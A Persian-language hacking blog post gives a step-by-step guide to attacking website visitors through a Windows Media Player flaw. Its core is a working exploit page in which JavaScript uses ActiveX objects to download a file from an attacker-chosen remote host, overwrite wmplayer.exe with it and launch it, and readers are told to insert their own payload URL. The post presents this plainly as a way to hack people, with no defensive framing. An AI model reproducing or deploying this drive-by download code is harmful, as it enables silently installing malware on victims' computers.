استفاده از اکسپلویت Media Code, Media Code


استفاده از اکسپلویت Media Code, Media Code

چگونه افراد را از طریق ورود به سایت و از طزیق استفاده از آسیب پذیری مدیا هک کنیم.

ابتدا برنامه Front Page را باز می کنیم و 1 Page بصورت HTML درست می کنیم.

سپس کا را که در کادر مشاهدا می کنید آن رت کپی کرده و در آن Past
می کنیم


________________________________________________________

<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.********.com/****.***",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\Program Files\Windows Media Player\wmplayer.exe",2);
location.href = "mms://";

</textarea>
Wait a couple of seconds..

<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/ /);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^s+/,"");
line = line.replace(/s+$/,"");
line = line.replace(/'/g,"\'");
line = line.replace(/[\]/g,"\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\r\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}


window.open("error.jsp","_media");

setTimeout("doit()", 5000);


</script>

__________________________________________________________

حال شما آدرس فایل مورد نظر خود را به جای
http://www.Host .com/****.***l 
Past کنید .

موفق باشید

نوشته شده توسط : نادر نصیری ( Master )
حق کپی رایت از سایت : www.PersianHacKer.Org
نظرات 0 + ارسال نظر
برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد